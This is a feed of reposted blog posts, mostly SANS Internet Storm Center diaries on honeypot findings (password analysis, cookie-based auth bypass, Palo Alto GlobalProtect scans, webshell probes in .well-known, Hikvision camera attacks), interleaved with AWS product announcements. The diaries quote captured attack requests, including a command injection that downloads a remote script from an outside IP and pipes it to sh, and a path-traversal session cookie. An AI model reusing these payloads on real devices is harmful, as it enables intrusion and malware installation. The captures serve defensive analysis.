[Guest Diary] Comparing Honeypot Passwords with HIBP, (Wed, Oct 1st)

This post was originally published on this site

[This is a Guest Diary by Draden Barwick, an ISC intern as part of the SANS.edu Bachelor's Degree in Applied Cybersecurity (BACS) program [1].]

DShield Honeypots are constantly exposed to the internet and inundated with exploit traffic, login attempts, and other malicious activity. Analyzing the logged password attempts can help identify what attackers are targeting. To go through these passwords, I have created a tool that leverages HaveIBeenPwned’s (HIBP’s) API to flag passwords that haven’t appeared in any breaches.

Purpose

Identifying passwords that haven’t been seen in known breaches is useful because it can indicate additional planning and help identify patterns in these less common passwords. Anyone that operates a honeypot (and receives a lot of data on attempted use of passwords in plaintext) could benefit from this project as an additional starting point for investigations.

Development

HaveIBeenPwned maintains a large database of breached passwords and offers an API to tell if a given password has been compromised. This is done by making a request to “https://api.pwnedpasswords.com/range/#####”. Where the “#####” part in a request is the first 5 characters (prefix) of the SHA1 hash of the tested password. The site will return a list of the last 35 characters (suffix) for any password hash in the database that starts with the provided prefix. Each entry includes a count of how many times the corresponding password has been seen in breaches. This prevents anyone from knowing the full hash of the password we are looking for based on the request alone. While this consideration is not important for our use with the DShield honeypots (as all passwords seen are publicly uploaded), it is important to understand because HIBP does not allow for searching with the full hash directly [2].

To gather a list of all passwords my honeypot has gathered, I used JQ to parse the cowrie.json files located in the /srv/cowrie/var/log/cowrie directory. This command matches on any login failures or successes, and returns the password field from matching entries:

jq -r 'select(.eventid=="cowrie.login.failed" or .eventid=="cowrie.login.success") | [.password] | @tsv' /srv/cowrie/var/log/cowrie/cowrie.json* 

To extend this, we can remove duplicates using sort and uniq and save the unique passwords to a file:

jq -r 'select(.eventid=="cowrie.login.failed" or .eventid=="cowrie.login.success") | [.password] | @tsv' /srv/cowrie/var/log/cowrie/cowrie.json* | sort | uniq > ~/uniquepass.txt

As of writing, this took the number of passwords from 51,601 to 16,210 unique passwords.

Now that we have a list of unique passwords, the next steps are to: read the created password file, take the SHA1 hash of each line, query the API for the hash prefix, and check for the hash suffix in the results.

To accomplish this, I created a Python script that utilizes one input file and two output files. The input file has a list of passwords to check with one entry per line. One output file stores all passwords that have been checked, the SHA1 hash, and how many times HIBP has seen the password (this file is a CSV used to avoid checking a password in the input file if it has been checked before). The other output file stores the plaintext of any password never seen by HIBP. The command line usage looks like this:

python3 queryHIBP.py uniquepass.txt passwordResults.csv unseenPasswords.txt

This resulted in the identification of 1,196 passwords that HIBP has not seen.

Code Breakdown

The code, available on GitHub [3], has thorough commenting but we will examine some parts here to gain a deeper understanding of how it functions.

In Figure 1, we can see the section of code that handles reading the results file that includes all passwords we have searched for. This is expected to be formatted as a CSV file with a header of “password,sha1,count”. As explained above, this helps avoid checking passwords unnecessarily.

The code opens the file with csv.DictReader, checks for “password” in the header, then uses a for loop to go through all of the rows to pull non-empty passwords and add them to a set. The set is returned at the end of the function.

 
Figure 1: Code used to read all previously checked passwords.

 

In Figure 2, we can see the code used to make API requests and handle a common error. First, a loop is established and the API request is made. Second, we check for a 429 response code which means there were too many requests. If there was a 429 error, HIBP will add a “Retry-After” header which lets us know how long to wait before trying again. The user agent is specified elsewhere as “PasswordCheckingProject” because HIBP states that “A missing user agent will result in an HTTP 403 response” [4].


Figure 2: Code used to make API requests and handle expected 429 errors.

 

Figure 3 shows the behavior for handling additional errors and normal function. Firstly, “resp.raise_for_status” is called which would raise an exception if there were an error with the HTTP request. If there’s no error, we simply iterate through all lines of the response to save the hash suffix and count in a dictionary, then return it. If an exception is raised, we increment an “attempt” variable which lets us cap the number of retries which is set to three by default. If the max is hit here, the code will print an error message indicating what prefix was being checked and exit. If there are more retries remaining, the script will wait 5 seconds before continuing. Figure 2 has a similar check for max retries to avoid a potential infinite loop of 429 errors.


Figure 3: Code used to store & return request results or deal with continued/unexpected errors.

 

Implementation

To download the project and try it out with some test data, one can run the following:

git clone https://github.com/MeepStryker/queryHIBP.git
cd queryHIBP
python3 queryHIBP.py ./sampleInput.txt ./passwordResults.csv ./unseenPasswords.txt

As the script runs, it will print out each unseen password identified and a short summary at the end as seen in Figure 4.


Figure 4: Script output using real data.

 

Automation

To automate the use of this tool, I created a cron job to run the JQ command & output results to a file and made another job to run the script with the needed arguments. These are set to run daily with the script running 5 minutes after the JQ command. This uses the following crontab entries:

0 17 * * * jq -r 'select(.eventid=="cowrie.login.failed" or .eventid=="cowrie.login.success") | [.password] | @tsv' /srv/cowrie/var/log/cowrie/cowrie.json* | sort | uniq > ~/uniquepass.txt

5 17 * * * python3 ~/queryHIBP.py ~/uniquepass.txt ~/passwordResults.csv ~/unseenPasswords.txt

The script runs 5 minutes after the JQ command to ensure there is more than enough time to create the input file. Since there is a limit on how long logs are retained, there are no concerns about this ever starting to take longer.

I chose this method over adding parsing functionality into the script out of convenience. Using the script would require additional logic and either hardcoding locations to check for logs or dealing with more arguments. As it is designed, anyone can easily plugin a list of passwords without having to worry about many command line options or editing the script.

Results

The script accurately provides information on passwords that HaveIBeenPwned has not seen in prior breaches. While there were more unseen passwords than one may expect (1,196 or ~7.4% of all unique passwords as of writing), it provides interesting insight into what some actors may be targeting. The results also reveal patterns for password mutations that are being leveraged for access attempts:

deploy12345
deploy123456
deploy1234567
deploy12345678
deploy@2022
deploy@2023
deploy@2025
deploy2025
deploy@321
deploypass
P@$$vords123
P@$sw0rd#
P4$$word!@#
P455wORd
P@55W0RD2004
Pa$$word2016!
pa33w0rd!@
Pa55w0rd@2021
passw0rd!@#$
pass@w0rd.12345
passwd@123!
PaSswORD@123
password@2!@
PaSswORd2021
password!2024
password!2025
Password43213
password!@#456

Password Patterns & Analysis

Analyzing the passwords seen in the above Results section can provide some insight into what techniques are being used to generate passwords.

Consider the above sample of results. Broadly speaking, this ‘deploy family’ of passwords was likely generated by starting with a base password of “deploy” and adding common modifiers to increase complexity. Seen here are good examples of the most simple ones: adding the year (with an @ sign in this case) and adding sequential numbers.

The rest of the entries above are all based on the word ‘password’. These are more complex than what we saw with ‘deploy’. Below are three entries, a plain explanation of a Hashcat rule that could be used to come up with it, and a sample implementation of the rule:

  • P4$$word!@#
    • Capitalize the first letter, replace a’s with 4’s, replace s’s with $’s, add !@# to end – c sa4 ss$ $! $@ $#
  • P@55W0RD2004
    • Capitalize all letters, replace a’s with @’s, replace s’s with 5’s, replace o’s with 0’s, and add a year to the end – u sa@ ss5 so0 $2 $0 $0 $4
  • Password!2024
    • Capitalize the first letter, add ! and a year to the end – t0 $! $2 $0 $2 $4

Both Hashcat and John the Ripper can make these modifications by using rules to augment password lists. The rules allow various changes to input such as replacing or swapping certain characters with others. Note that while much of the rules syntax between these tools is similar, there are some differences [5].

Looking through the unseen passwords, we can also see more specific targets such as Elasticsearch, Oracle, PostgresSQL, and Ubuntu. Figure 5 shows some of these passwords, which use the same kind of modifications mentioned earlier, and illustrate the relative difference in frequency.


Figure 5: Passwords related to specific services/platforms.

Overall Takeaway

While a good amount of manual analysis will still be required, these results can provide a lot of value and the script helps cut down on time. We can learn more about common password modifications to avoid and even get an idea of the relative interest of different targets. In Figure 5 alone, we can see that PostgresSQL may be roughly two times more likely to be targeted than Elasticsearch with newer installations being targeted in particular.

For future work, I would add a feature to recheck the known unseen passwords to identify if they happen to be newly breached.

Additionally, I may consider adding two features for convenience. The first would be re-sorting the unseen file since it is append only. The second would be parsing features to simplify automation and allow the script to provide more functionality for end users.

[1] https://www.sans.edu/cyber-security-programs/bachelors-degree/
[2] https://haveibeenpwned.com/API/v3#PwnedPasswords
[3] https://github.com/MeepStryker/queryHIBP
[4] https://haveibeenpwned.com/API/v3#UserAgent
[5] https://hashcat.net/wiki/doku.php?id=rule_based_attack#compatibility_with_other_rule_engines

 


Jesse La Grew
Handler

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Announcing Amazon ECS Managed Instances for containerized applications

This post was originally published on this site

Today, we’re announcing Amazon ECS Managed Instances, a new compute option for Amazon Elastic Container Service (Amazon ECS) that enables developers to use the full range of Amazon Elastic Compute Cloud (Amazon EC2) capabilities while offloading infrastructure management responsibilities to Amazon Web Service (AWS). This new offering combines the operational simplicity of offloading infrastructure with the flexibility and control of Amazon EC2, which means customers can focus on building applications that drive innovation, while reducing total cost of ownership (TCO) and maintaining AWS best practices.

Customers running containerized workloads told us they want to combine the simplicity of serverless with the flexibility of self-managed EC2 instances. Although serverless options provide an excellent general-purpose solution, some applications require specific compute capabilities, such as GPU acceleration, particular CPU architectures, or enhanced networking performance. Additionally, customers with existing Amazon EC2 capacity investments through EC2 pricing options couldn’t fully use these commitments with serverless offerings.

Amazon ECS Managed Instances provides a fully managed container compute environment that supports a broad range of EC2 instance types and deep integration with AWS services. By default, it automatically selects the most cost-optimized EC2 instances for your workloads, but you can specify particular instance attributes or types when needed. AWS handles all aspects of infrastructure management, including provisioning, scaling, security patching, and cost optimization, enabling you to concentrate on building and running your applications.

Let’s try it out

Looking at the AWS Management Console experience for creating a new Amazon ECS cluster, I can see the new option for using ECS Managed Instances. Let’s take a quick tour of all the new options.

Creating a ECS cluster with Managed Instances

After I’ve selected Fargate and Managed Instances, I’m presented with two options. If I select Use ECS default, Amazon ECS will choose general purpose instance types based on grouping together pending Tasks, and picking the optimum instance type based on cost and resilience metrics. This is the most straightforward and recommended way to get started. Selecting Use custom – advanced opens up additional configuration parameters, where I can fine-tune the attributes of instances Amazon ECS will use.

Creating a ECS cluster with Managed Instances

By default, I see CPU and Memory as attributes, but I can select from 20 additional attributes to continue to filter the list of available instance types Amazon ECS can access.

Creating a ECS cluster with Managed Instances

After I’ve made my attribute selections, I see a list of all the instance types that match my choices.

Creating a ECS cluster with Managed Instances

From here, I can create my ECS cluster as usual and Amazon ECS will provision instances for me on my behalf based on the attributes and criteria I’ve defined in the previous steps.

Key features of Amazon ECS Managed Instances

With Amazon ECS Managed Instances, AWS takes full responsibility for infrastructure management, handling all aspects of instance provisioning, scaling, and maintenance. This includes implementing regular security patches initiated every 14 days (due to instance connection draining, the actual lifetime of the instance may be longer), with the ability to schedule maintenance windows using Amazon EC2 event windows to minimize disruption to your applications.

The service provides exceptional flexibility in instance type selection. Although it automatically selects cost-optimized instance types by default, you maintain the power to specify desired instance attributes when your workloads require specific capabilities. This includes options for GPU acceleration, CPU architecture, and network performance requirements, giving you precise control over your compute environment.

To help optimize costs, Amazon ECS Managed Instances intelligently manages resource utilization by automatically placing multiple tasks on larger instances when appropriate. The service continually monitors and optimizes task placement, consolidating workloads onto fewer instances to dry up, utilize and terminate idle (empty) instances, providing both high availability and cost efficiency for your containerized applications.

Integration with existing AWS services is seamless, particularly with Amazon EC2 features such as EC2 pricing options. This deep integration means that you can maximize existing capacity investments while maintaining the operational simplicity of a fully managed service.

Security remains a top priority with Amazon ECS Managed Instances. The service runs on Bottlerocket, a purpose-built container operating system, and maintains your security posture through automated security patches and updates. You can see all the updates and patches applied to the Bottlerocket OS image on the Bottlerocket website. This comprehensive approach to security keeps your containerized applications running in a secure, maintained environment.

Available now

Amazon ECS Managed Instances is available today in US East (North Virginia), US West (Oregon), Europe (Dublin), Africa (Cape Town), Asia Pacific (Singapore), and Asia Pacific (Tokyo) AWS Regions. You can start using Managed Instances through the AWS Management Console, AWS Command Line Interface (AWS CLI), or infrastructure as code (IaC) tools such as AWS Cloud Development Kit (AWS CDK) and AWS CloudFormation. You pay for the EC2 instances you use plus a management fee for the service.

To learn more about Amazon ECS Managed Instances, visit the documentation and get started simplifying your container infrastructure today.

Announcing AWS Outposts third-party storage integration with Dell and HPE

This post was originally published on this site

Since announcing second-generation AWS Outposts racks in April with breakthrough performance and scalability, we’ve continued to innovate on behalf of our customers at the edge of the cloud. Today, we’re expanding AWS Outposts third-party storage integration program to include Dell PowerStore and HPE Alletra Storage MP B10000 systems, joining our list of existing integrations with NetApp on-premises enterprise storage arrays and Pure Storage FlashArray. This program makes it easy for customers to use AWS Outposts with third-party storage arrays through AWS native tooling. The solution integration is particularly important for organizations migrating VMware workloads to AWS who need to maintain their existing storage infrastructure during the transition, and for those who must meet strict data residency requirements by keeping their data on-premises while using AWS services.

Outposts compute rack_Gen2_front_45This announcement builds upon two significant storage integration milestones we achieved in the past year. In December 2024, we introduced the ability to attach block data volumes from third-party storage arrays to Amazon EC2 instances on Outposts directly through the AWS Management Console. Then in July 2025, we enabled booting Amazon EC2 instances directly from these external storage arrays. Now, with the addition of Dell and HPE, customers have even more choice in how they integrate their on-premises storage investments with AWS Outposts.

Enhanced storage integration capabilities

Our third-party storage integration supports both data and boot volumes, offering two boot methods: iSCSI SANboot and Localboot. The iSCSI SANboot option enables both read-only and read-write boot volumes, while Localboot supports read-only boot volumes using either iSCSI or NVMe-over-TCP protocols. With this comprehensive approach, customers can centrally manage their storage resources while maintaining the consistent hybrid experience that Outposts provides.

Through the Amazon EC2 Launch Instance Wizard in the AWS Management Console, customers can configure their instances to use external storage from any of our supported partners. For boot volumes, we provide AWS-verified AMIs for Windows Server 2022 and Red Hat Enterprise Linux 9, with automation scripts available through AWS Samples to simplify the setup process.

Support for various Outposts configurations

All third-party storage integration features are supported on Outposts 2U servers and both generations of Outposts racks. Support for second-generation Outposts racks means customers can combine the enhanced performance of our latest EC2 instances on Outposts—including twice the vCPU, memory, and network bandwidth—with their preferred storage solutions. The integration works seamlessly with both our new simplified network scaling capabilities and specialized Amazon EC2 instances designed for ultra-low latency and high throughput workloads.

Things to know

Customers can begin using these capabilities today with their existing Outposts deployments or when ordering new Outposts through the AWS Management Console. If you are using third-party storage integration with Outposts servers, you can have either your onsite personnel or a third-party IT provider install the servers for you. After the Outposts servers are connected to your network, AWS will remotely provision compute and storage resources so you can start launching applications. For Outposts rack deployments, the process involves a setup where AWS technicians verify site conditions and network connectivity before the rack installation and activation. Storage partners assist with the implementation of the third-party storage components.

Third-party storage integration for Outposts with all compatible storage vendors is available at no additional charge in all AWS Regions where Outposts is supported. See the FAQs for Outposts servers and Outposts racks for the latest list of supported Regions.

This expansion of our Outposts third-party storage integration program demonstrates our continued commitment to providing flexible, enterprise-grade hybrid cloud solutions, meeting customers where they are in their cloud migration journey. To learn more about this capability and our supported storage vendors, visit the AWS Outposts partner page and our technical documentation for Outposts servers, second-generation Outposts racks, and first-generation Outposts racks. To learn more about partner solutions, check out Dell PowerStore integration with AWS Outposts and HPE Alletra Storage MP B10000 integration with AWS Outposts.

"user=admin". Sometimes you don't even need to log in., (Tue, Sep 30th)

This post was originally published on this site

One of the common infosec jokes is that sometimes, you do not need to "break" an application, but you have to log in. This is often the case for weak default passwords, which are common in IoT devices. However, an even easier method is to tell the application who you are. This does not even require a password! One of the sad recurring vulnerabilities is an HTTP cookie that contains the user's username or userid.

I took a quick look at our honeypot for cookies matching this pattern. Here is a selection:

Cookie: uid=1
Cookie: user=admin
Cookie: O3V2.0_user=admin
Cookie: admin_id=1; gw_admin_ticket=1
Cookie: RAS_Admin_UserInfo_UserName=admin
Cookie: CMX_SAVED_ID=zero; CMX_ADMIN_ID=science; CMX_ADMIN_NM=liquidworm; CMX_ADMIN_LV=9; CMX_COMPLEX_NM=ZSL; CMX_COMPLEX_IP=2.5.1.
Cookie: admin_id=1; gw_admin_ticket=1;
Cookie: ASP.NET_SessionId=; sid=admin

These are listed by frequency, with "uid=1" being the most commonly used value.

Let's see if we can identify some of the targeted vulnerabilities.

For the first one (uid=1), the URL hit is:

/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<some shell command>

%%CVE:2024-3w721%%: This is a relatively new (2024) OS command injection vulnerability in certain TBK DVRs. 

The second one is also an IoT-style issue:

POST /goform/set_LimitClient_cfg
User-Agent: Mozilla/5.0 (makenoise@tutanota.de)
Content-Type: application/x-www-form-urlencoded
Content-Length: 113
Cookie: user=admin

time1=00:00-00:00&time2=00:00-00:00&mac=%3Bwget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.xqe.sh%7Csh%26echo%20

%%CVE:2023-26801%%: Another "classic" IoT issue. This one affects LB-LINK wireless routers. This vulnerability may never have been patched, but I'm unsure how popular these routers are.

The cookie "O3V2.0_user=admin" is associated with a similar, but more recent issue affecting Tenda O3V2 wireless access points. Wireless internet service providers (WISPs) often use these outdoor access points. The vulnerability is similar to the issue above in that a POST request to "/goform/setPingInfo" is used to carry an OS injection payload—the common URL schemes like "/goform" point to similar firmware and likely similar vulnerabilities.

" admin_id=1; gw_admin_ticket=1": Google returned a reference to a post in Chinese, implying that this is a vulnerability in "Qi'anxin VPN" and allows arbitrary account and password modification.

"RAS_Admin_UserInfo_UserName=admin" affects the "Comai RAS System" software for managing remote desktop environments. Most references to the vulnerability are in Chinese. I did not see a CVE number, but the vulnerability appears to be three years old.

"CMX_SAVED_ID=zero; CMX_ADMIN_ID=science": No CVE, and there is no fix for this issue, which was discovered in 2021. Only affects a biometric access system 🙁 (COMMAX. See https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5661.php.

So in short: Yes… These vulnerabilities are out there, and they are exploited.


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Apple Patches Single Vulnerability CVE-2025-43400, (Mon, Sep 29th)

This post was originally published on this site

It is typical for Apple to release a ".0.1" update soon after releasing a major new operating system. These updates typically fix various functional issues, but this time, they also fix a security vulnerability. The security vulnerability not only affects the "26" releases of iOS and macOS, but also older versions. Apple released fixes for iOS 18 and 26, as well as for macOS back to Sonoma (14). Apple also released updates for WatchOS and tvOS, but these updates do not address any security issues. For visionOS, updates were only released for visionOS 26.

Increase in Scans for Palo Alto Global Protect Vulnerability (CVE-2024-3400), (Mon, Sep 29th)

This post was originally published on this site

We are all aware of the abysmal state of security appliances, no matter their price tag. Ever so often, we see an increase in attacks against some of these vulnerabilities, trying to mop up systems missed in earlier exploit waves. Currently, on source in particular, %%ip:141.98.82.26%% is looking to exploit systems vulnerable to CVE-2024-3400. The exploit is rather straightforward. Palo Alto never considered it necessary to validate the session id. Instead, they use the session ID "as is" to create a session file. The exploit is well explained by watchTowr [1].

First, we see a request to upload a file:

POST /ssl-vpn/hipreport.esp
Host: [honeypot ip]:8080
User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Connection: close
Content-Length: 174
Content-Type: application/x-www-form-urlencoded
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/33EGKkp7zRbFyf06zCV4mzq1vDK.txt;
Accept-Encoding: gzip

user=global&portal=global&authcookie=e51140e4-4ee3-4ced-9373-96160d68&domain=global&computer=global&client-ip=global&client-ipv6=global&md5-sum=global&gwHipReportCheck=global

Next, a request to retrieve the uploaded file:

GET /global-protect/portal/images/33KFpJLBHsMmkNuxs7pqpGOIIgF.txt
host: [honeypot ip]
user-agent: Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
connection: close
accept-encoding: gzip

This will return a "403" error if the file exists, and a "404" error if the upload failed. It will not execute code. The content of the file is a standard Global Protect session file, and will not execute. A follow-up attack would upload the file to a location that leads to code execution. 

The same source is also hitting the URL "/Synchronization" on our honeypots. Google AI associates this with a Global Protect vulnerability discovered last week, but this appears to be a hallucination.  

[1] https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

AWS Weekly Roundup: Amazon S3, Amazon Bedrock AgentCore, AWS X-Ray and more (September 29, 2025)

This post was originally published on this site

Wow, can you all believe it? We’re nearing the end of the year already. Next thing you know, AWS re:Invent will be here! This is our biggest event that takes place every year in Las Vegas from December 1st to December 5th where we reveal and release many of the things that we’ve been working on. If you haven’t already, buy your tickets to AWS re:Invent 2025 to experience it in person. If you can’t make it to Vegas, don’t worry, make sure to stay tuned here on the AWS News Blog where will be covering many of the announcements as they happen.

However, there are plenty of new exciting new releases between now and then, so, as usual, let’s take a quick look at some of the highlights from last week so you can catch up on what’s been recently launched, starting with one of the most popular services: Amazon S3!

S3 updates
The S3 team has been working really hard to make working with S3 even better. This month alone has seen releases such as bulk target selection for S3 Batch Operations, support for conditional deletes in S3 general purpose buckets, increased file size and archive scanning limits for malware protection, and more.

Last week was another S3 milestone with the addition of a preview in the AWS Console for Amazon S3 Tables. You can now take a quick peek at your S3 Tables right from the console, making it easier to understand their data structure and content without writing any SQL. This viewer-friendly feature is ready to use across all regions where S3 Tables are supported, with costs limited to just the S3 requests needed to display your table preview.

Other releases
Here are some highlights from other services which also released some great stuff this week.

Amazon Bedrock AgentCore expands enterprise integration and automation options — Bedrock AgentCore services are leveling up their enterprise readiness with new support for Amazon VPC connectivity, AWS PrivateLink, AWS CloudFormation, and resource tagging, giving developers more control over security and infrastructure automation. These enhancements let you deploy AI agents that can securely access private resources, automate infrastructure deployment, and maintain organized resource management whether you’re using AgentCore Runtime for scalable agent deployment, Browser for web interactions, or Code Interpreter for secure code execution.

AWS X-Ray brings smart sampling for better error detection — AWS X-Ray now offers adaptive sampling that automatically adjusts trace capture rates within your defined limits, helping DevOps teams and SREs catch critical issues without oversampling during normal operations. The new capability includes Sampling Boost for increased sampling during anomalies and Anomaly Span Capture for targeted error tracing, giving teams better observability exactly when they need it while keeping costs in check.

AWS Clean Rooms enhances real-time collaboration wilth incremental ID mapping — AWS Clean Rooms now lets you update ID mapping tables with only new, modified, or deleted records through AWS Entity Resolution, making data synchronization across collaborators more efficient and timely. This improvement helps measurement providers maintain fresh datasets with advertisers and publishers while preserving privacy controls, enabling always-on campaign measurement without the need to reprocess entire datasets.

Short and sweet
Here are some bite-sized updates that could prove really handy for your teams or workloads.

Keeping up with the latest EC2 instance types can be challenging. AWS Compute Optimizer now supports 99 additional instance types including the latest C8, M8, R8, and I8 families.

In competitive gaming, every millisecond counts! Amazon GameLift has launched a new Local Zone in Dallas bringing ultra-low latency game servers closer to players in Texas.

When managing large-scale Amazon EC2 deployments, control is everything! Amazon EC2 Allowed AMIs setting now supports filtering by marketplace codes, deprecation time, creation date, and naming patterns to help prevent the use of non-compliant images. Additionally, EC2 Auto Scaling now lets you force cancel instance refreshes immediately, giving you faster control during critical deployments.

Making customer service more intelligent and secure across languages! Amazon Connect introduces enhanced analytics in its flow designer for better customer journey insights, adds custom attributes for precise interaction tracking, and expands Contact Lens sensitive data redaction to support seven additional European and American languages.

That’s it for this week!

Don’t forget to check out all the upcoming AWS events happening across the globe. There are many exciting opportunities for you to attend free events where you can meet lots of people and learn a lot while enjoying a great day amongst other like-minded people in the tech industry.

And if you feel like competing for some cash, time is running out to be part of something extraordinary! The AWS AI Agent Global Hackathon continues until October 20, offering developers a unique opportunity to build innovative AI agents using AWS’s comprehensive gen AI stack. With over $45,000 in prizes and exclusive go-to-market opportunities up for grabs, don’t miss the chance to showcase your creativity and technical prowess in this global competition.

I hope you have found something useful or exciting within this last week’s launches. We post a weekly review every Monday to help you keep up with the latest from AWS so make sure to bookmark this and hopefully see you for the next one!

Matheus Guimaraes | @codingmatheus

New tool: convert-ts-bash-history.py, (Fri, Sep 26th)

This post was originally published on this site

In SANS FOR577[1], we talk about timelines on day 5, both filesystem and super-timelines. but sometimes, I want something quick and dirty and rather than fire up plaso, just to create a timeline of .bash_history data, it is nice to just be able to parse them and, if timestamps are enabled, see them in a human-readable form. I've had some students in class write scripts to do this and even had one promise to share it with me after class, but I never ended up getting it so I decided to write my own. This script takes the path to 1 or more .bash_history files and returns a PSV (pipe separated values) list (on stdout) in the form: <filename>|<datetime>|<command> where the <datetime> is in ISO-8601 format (the one true date time format, but only to 1 sec resolution since that his the best that the .bash_history file will give us). In a future version I will probably offer an option to change from PSV to CSV. 

Webshells Hiding in .well-known Places, (Thu, Sep 25th)

This post was originally published on this site

Ever so often, I see requests for files in .well-known recorded by our honeypots. As an example:

GET /.well-known/xin1.php?p
Host: [honeypot host name]

The file names indicate that they are likely looking for webshells. In my opinion, the reason they are looking in .well-known is that this makes a decent place to hide webshells without having them overwritten by an update to the site.

The .well-known directory is meant to be used for various informational files [1], and for example, for ACME TLS challenges. As a result, it is the only directory or file starting with "." that must be accessible via the web server. But it is also "hidden" to Unix command line users. I have written about the various legitimate users of .well-known before [2]. 

We also see some requests for PHP files in the acme-challenge subdirectory, as well as the pki-challenge subdirectory:

Here are some of the more common, but not "standard" URLs in .well-known hit in our honeypots:

/.well-known/pki-validation/about.php
/.well-known/about.php
/.well-known/acme-challenge/cloud.php
/.well-known/acme-challenge/about.php
/.well-known/pki-validation/xmrlpc.php
/.well-known/acme-challenge/index.php

 

 

[1] https://datatracker.ietf.org/doc/html/rfc8615
[2] https://isc.sans.edu/diary/26564

 —
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|image of an http request to .well-known/xin1.php?p

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Exploit Attempts Against Older Hikvision Camera Vulnerability, (Wed, Sep 24th)

This post was originally published on this site

I notice a new URL showing up in our web honeypot logs, which looked a bit interesting:

/System/deviceInfo?auth=YWRtaW46MTEK

The full request:image of the http request explained on the site.

GET /System/deviceInfo?auth=YWRtaW46MTEK
Host: 3.87.70.24
User-Agent: python-requests/2.32.4
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

The "auth" string caught my attention, in particular as it was followed by a base64 encoded string. The string decodes to admin:11.

This "auth" string has been around for a while for a number of Hikvision-related URLs. Until this week, the particular URL never hit our threshold to be included in our reports. So far, the "configurationFile" URL has been the most popular. It may give access to additional sensitive information.

 

Earliest Report Most Recent Report Total Number of Reports URL
2018-08-18 2025-09-23 6720 /System/configurationFile?auth=YWRtaW46MTEK
2017-12-14 2025-09-23 2293 /Security/users?auth=YWRtaW46MTEK
2021-03-09 2025-09-23 2002 /system/deviceInfo?auth=YWRtaW46MTEK
2020-09-25 2023-02-04 727 /security/users/1?auth=YWRtaW46MTEK
2018-09-09 2025-09-23 445 /onvif-http/snapshot?auth=YWRtaW46MTEK
2017-10-06 2017-10-06 6 /Streaming/channels/1/picture/?auth=YWRtaW46MTEKYOBA
2025-04-09 2025-04-29 2 /ISAPI/Security/users?auth=YWRtaW46MTEK

 

Some Googleing leads to CVE-2017-7921 [1]. Hikvision's advisory is sparse and does not identify a particular vulnerable URL [2]. But this looks to me more like some brute forcing. The CVE-2017-7921 vulnerability is supposed to be some kind of backdoor (Hikvision's description of it as "privilege escalation" was considered euphemistic at the time). But I doubt the password is "11", and a typical Hikvision default password is much more complex ("123456" in the past).

We have written about Hikvision many times before; its cameras, as well as cameras from competitors like Dahua, are well known for their numerous security vulnerabilities, hard-coded "support passwords", and other issues. One issue with many of these cameras has been a limited user interface. The DVR used to collect footage from these cameras often only includes a mouse and an onscreen keyboard, making it difficult to select reasonable passwords. This attack may count on users setting a simple password like "11" as by default, only a numeric onscreen keyboard is displayed on some models.

Another issue is the use of credentials on the URL, which is discouraged as they tend to leak easily in logs. But it may be yet again a convenience decision as you are able to create hyperlinks that will log you in automatically.

 

[1] https://nvd.nist.gov/vuln/detail/cve-2017-7921
[2] https://www.hikvision.com/us-en/support/document-center/special-notices/privilege-escalating-vulnerability-in-certain-hikvision-ip-cameras/
 


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.